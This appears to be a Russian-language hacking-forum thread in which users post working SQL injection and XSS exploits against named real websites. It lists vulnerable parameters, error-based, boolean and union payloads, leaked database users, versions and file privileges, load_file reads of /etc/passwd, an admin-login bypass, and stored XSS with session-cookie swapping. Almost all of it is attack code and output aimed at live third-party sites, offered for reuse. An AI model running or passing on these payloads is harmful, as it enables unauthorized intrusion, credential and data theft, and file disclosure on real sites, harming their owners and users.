SQLi Error base внедрение двойным запросом. Code: http://www.hairboutique.com/glossary/Detail.php?Keyword=Dimethicone Copolyol Meadowfoamate' and (select 1 from(select count(*), concat(0x3a,0x3a,(select user()),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a)b) and '1'='1 root@HB-85|file_priv Y|5.5.19|Win64x86|
Сайт: russikona.ru ТИЦ 160 SQLi Error base russikon_db@localhost|file_priv N|5.5.52-cll-lve|Linux|MySQL Community Server (GPL)|x86_64| Code: http://www.russikona.ru/news.php?id=198' AND (select 1 from(select count(*), concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name='admin' limit 1,1),0x3a,0x3a, floor(rand()*2))a from information_schema.columns group by a)b) --+ XSS-reflected: Code: http://www.russikona.ru/news.php?id=198%27%3e%3cbody+onload%3dalert(document.cookie)%3e Надеюсь ничьих чувств не оскорбил
Сайт: rakuraku-home.jp SQLi Error base через POST [email protected]|5.0.27-standard-log|unknown-linux-gnu|x86_64|MySQL Community Edition - Standard (GPL)| Уязвимые параметры account и password В запросе через Repeater нужно отправить в параметр account эксплоит, а в параметр password любой символ, букву или цифру эксплоит: Code: URL:http://www.rakuraku-home.jp/system/login/login.php POST:' AND (select 1 from(select count(*), concat(0x3a,0x3a,(select user()),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a)b) # вход в админку логин и пароль 1' or '1 Админка: Code: http://www.rakuraku-home.jp/system/
Парочка сайтов с финансовой тематикой Сайт: eltee.de SQL Injection через GET, уязвимый параметр id, вывод в title pc-linux-gnu:i686:[email protected]:db456679871:5.1.73 эксплоит: Code: view-source:http://www.eltee.de/education_id.php?id=-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(@@version_compile_os,0x3a,@@version_compile_machine,0x3a,user(),0x3a,database(),0x3a,@@version,0x3a,0x3a,0x3a,FLOOR(RAND(0)*2))a FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY a)b) Сайт: businesstoday.lk SQL Injection через GET, уязвимый параметр issue 5.5.52-cll:bttoday_bt:bttoday_btadmin@localhost:Linux:i686:/usr эксплоит: Code: http://www.businesstoday.lk/bnb.php?bnbId=&issue=-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(@@version,0x3a,database(),0x3a,user(),0x3a,@@version_compile_os,0x3a,@@version_compile_machine,0x3a,@@basedir,0x3a,FLOOR(RAND(0)*2))a FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY a)b)
Шоп с 3d принтерами и всяким оборудованием Сайт: smtmax.com SQL Injection через GET, уязвимый параметр act Linux:x86_64:smtmax8_smtmax@localhost:smtmax8_smtmax:5.6.35:/usr эксплоит: Code: http://www.smtmax.com/info.php?act=-1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(%40%40version_compile_os%2c0x3a%2c%40%40version_compile_machine%2c0x3a%2cuser()%2c0x3a%2cdatabase()%2c0x3a%2c%40%40version%2c0x3a%2c%40%40basedir%2c0x3a%2cFLOOR(RAND(0)*2))a+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+a)b)%2b%27 Сайт адалт тематики: straightpornstuds.com Примерные данные за день Посетителей: 1469 Просмотров: 5878 Boolean Based SQL Injection 5.0.96 log:str5lt3m [email protected]:str5lt3m1 2 Если появился видео ролик от BRAZERS с брюнеткой в очках с толстой жопой и силиконовыми буферами значит "true" Если перекинуло на ролик от DDFnetwork где бландинку долбят в рот в четыре ствола это "false" эксплоит: Code: http://straightpornstuds.com/80341%20OR%20(select%20ascii(substr(database(),1,1))=115).html P.s. когда true страничка может долго подгружаться.
Щоп с компьютерными аксессуарами Сайт: groupgear.co.uk MS SQL Injection через POST уязвимый параметр inputsearch microsoft sql server 2012 (sp1) - 11.0.3156.0 (x64) may 4 2015 18:48:09 copyright (c) microsoft corporation web edition (64-bit) on windows nt 6.2 <x64> (build 9200: ) (hypervisor)| computergear2012|computerSQL2014 эксплоит: Code: URL:http://www.groupgear.co.uk/searchResults.asp POST:'AND 1=cast(@@VERSION as varchar(8000)) or '1'='
Сайт: magiclantern.org.uk Boolean Based SQL Injection черз GET, уязвимый параметр id 5.5.54-38 7-log:umag_249477_0001 linweb7.atlas.pipex.net:magiclanternorguk_249477_db1 Если есть пост с заголовком The Temple of Minerva "true" Если нет поста с заголовком The Temple of Minerva "false" Эксплоит: Code: http://www.magiclantern.org.uk/sales/publications.php?id=13 OR (select ascii(substr(@@VERSION,1,1))=53) Stored XSS: Уязвимые параметры: Contact_Name;Email_address;Email_address2;Subject Открываем URL в Firefox и в одном из уязвимых полей или во всех вставляем payload, жмем Submit, наш код сохранился на сервере Code: URL:http://www.magiclantern.org.uk/contact.php payload: "><img src=ssds onerror=alert(666) width=0 height=0> Теперь нужно сохранить Cookie PHPSESSID(из Firefox) в блокнот Вычистим куки из Firefox и пройдем снова по нашему URL ни чего не работает (( закрываем Firefox и открываем другой браузер, например хром, устанавливаем туда любой кукименежжер, открываем любую страницу нашего сайта например главную magiclantern.org.uk в куки менеджере меняем Cookie PHPSESSID(из Хром) на Cookie PHPSESSID(из Firefox) переходим на вкладку Contact Us видим выполнение нашего скрипта в хроме.
НУ я так и знал. А вам слабо самому что-то найти и сделать? Вы попробуйте, я уверен вы сможете. Я просто не понимаю, я конечно не профи, но я невкуриваю, зачем крутить как слепую когда есть вывод. А вообще, скажи мне , что это а инструмент такой? Там ещё мод сек, только что он делает я не понял
Code: http://www.magiclantern.org.uk/sales/publications.php?id=-1 union all select 1,2,USER(),@@version,database(),@@basedir,@@version_compile_os,@@version_compile_machine,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 --+ Так лучше ? ))
SQLi с чтением файла из файловой системы и file_priv Y Сайт:eohu.ca Уязвимый параметор: newsID через GET root:Y,root:Y,root:Y,debian-sys-maint:Y,phpmyadmin:N,root:Y root@localhost:5.1.49-1ubuntu8:debian-linux-gnu:x86_64 Эксплоит: Code: http://www.eohu.ca/news/view_news_e.php?newsID=-1' union all select group_concat(user,0x3a,file_priv),user(),load_file('/etc/passwd') from mysql.user --+
SQLi с чтением файла из файловой системы Сайт:bbgv.org Уязвимый параметор: cat_id через GET root:Y,root:Y,root:Y,:N,:N,bbgv_web:N,bbgv_bk:N root@localhost:5.1.73:redhat-linux-gnu:x86_64 Эксплоит: Code: view-source:http://bbgv.org/bbgv-events/events.html?cat_id=-1 union all select 1,2,3,group_concat(user,0x3a,file_priv),5,6,7,8,9,10,user(),12,13,14,15,load_file('/etc/passwd'),17,18,19,20,21,22,23,24,25,26 from mysql.user --+
Сайт:salut.ru ТИЦ 475 SQLi Error base черз GET, уязвимый параметр SectionId salut@localhost:5.1.67-0ubuntu0.10.04.1:debian-linux-gnu:x86_64:/usr/ Эксплоит: Code: http://salut.ru/Section.php?SectionId=18' AND (select 1 from(select count(*), concat(0x3a,0x3a,(select @@version),0x3a,0x3a, floor(rand()*2))a from information_schema.tables group by a)b) --+ Сайт:irbis-opt.ru ТИЦ 20 Всякие палатки и спортивная снаряга SQLi черз GET, уязвимый параметр idd [email protected]:10.1.22-MariaDB:Linux:x86_64:/usr Эксплоит: Code: http://www.irbis-opt.ru/catalog.php?idd=-12' union all select @@version --+ Сайт:economic-study.ru ТИЦ 10 Вузы Москвы SQLi черз GET, уязвимый параметр ID vsevedpr_econom@localhost:5.5.52-38.3:vsevedpr_econom:debian-linux-gnu:x86_64:/usr Эксплоит: Code: http://economic-study.ru/ManagerDetails.php?LID=1&ID=-1 union all select 1,2,3,user(),@@version,database(),@@version_compile_os,@@version_compile_machine,@@basedir,10 --+
Я когда форум просматривал, посты с .ru часто попадались, или это новые правила? Если админы скажут не вопрос, удалю свой пост. Да и софтом я в .ru не лазил, искал через дорки и крутил руками
Сайт:ene.com.tw SQLi черз GET с чтением файла из файловой системы, уязвимый параметр pid root:Y,root:Y,root:Y,:N,:N,enemysql:N,enemysql:Y. enemysql@localhost:5.1.73:redhat-linux-gnu:x86_64:/var/log/mysqld.log. Эксплоит: Code: http://www.ene.com.tw/english/ir/newsdetail.php?fid=14&pid=-1' union all select 1,2,3,group_concat(user,0x3a,file_priv),5,@@version,load_file('/etc/passwd'),8,9,10 from mysql.user --+
sqli: http://xn--80aaatb1acozlcgklg.xn--p1ai/goods.aspx?id=80637 UNION ALL SELECT 1,2,3 а дальше не получается раскрутить